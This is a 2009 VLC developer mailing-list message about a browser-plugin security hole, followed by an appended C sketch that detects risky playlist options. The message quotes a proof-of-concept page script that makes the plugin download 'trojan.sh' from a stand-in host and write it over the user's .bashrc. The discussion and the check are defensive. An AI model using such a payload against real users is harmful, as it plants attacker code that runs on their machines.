[vlc-devel] Regarding the seemingly still "obscure" security problem

Jean-Baptiste Kempf jb at videolan.org
Sat Jan 17 16:34:04 CET 2009


On Sat, Jan 17, 2009 at 03:26:25PM +0200, Rémi Denis-Courmont wrote :
> <script type="text/javascript"><!--
>   var vlc = document.getElementById("vlc");
>   var src = "http/dump://www.example.com/trojan.sh";
>   var dst = ".bashrc";
>   vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
>   vlc.playlist.play ();
> //!--></script>
> </body>
> </html>

I think this was brought to attention during the summit.

One question is: could we, in the plugin call add(),
detect demuxdump, sout and file-logging options and, in that case,
warn the user that some file will be overwritten?

Best Regards,

-- 
Jean-Baptiste Kempf
http://www.jbkempf.com/
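
The check asked about above, as an added example; it is not part of the original message and is not VLC's own code. The function names are hypothetical, and the option list holds only the names mentioned in this thread, so it is an assumed, incomplete list. It also inspects the MRL, because the quoted snippet selects the dump demuxer through the `http/dump://` form.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Option names taken from the message above; an assumed, incomplete list. */
static const char *const file_writing_opts[] = {
    "demuxdump-file", "sout", "file-logging",
};

/* True if a playlist option such as ":demuxdump-file=.bashrc" names a
 * file-writing option. Leading ':', '-' and spaces are skipped, and the
 * name ends at '=' or at the end of the string. */
bool option_writes_file(const char *opt)
{
    while (*opt == ':' || *opt == '-' || *opt == ' ')
        opt++;
    size_t len = strcspn(opt, "= ");
    size_t n = sizeof file_writing_opts / sizeof *file_writing_opts;
    for (size_t i = 0; i < n; i++)
        if (strlen(file_writing_opts[i]) == len &&
            strncmp(opt, file_writing_opts[i], len) == 0)
            return true;
    return false;
}

/* True if the MRL forces the dump demuxer with the "access/demux://" form,
 * as "http/dump://" does in the quoted page. */
bool mrl_forces_dump(const char *mrl)
{
    const char *sep = strstr(mrl, "://");
    if (sep == NULL)
        return false;
    const char *slash = memchr(mrl, '/', (size_t)(sep - mrl));
    if (slash == NULL)
        return false;
    size_t len = (size_t)(sep - slash - 1);
    return len == 4 && strncmp(slash + 1, "dump", 4) == 0;
}

/* Hypothetical gate for the plugin's add(): true means "ask the user first". */
bool add_needs_confirmation(const char *mrl, const char *const *opts, size_t n)
{
    if (mrl_forces_dump(mrl))
        return true;
    for (size_t i = 0; i < n; i++)
        if (option_writes_file(opts[i]))
            return true;
    return false;
}
```

Exact-name matching keeps an option such as `:sout-keep` from being flagged, but it also means any file-writing option missing from the list passes unnoticed.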


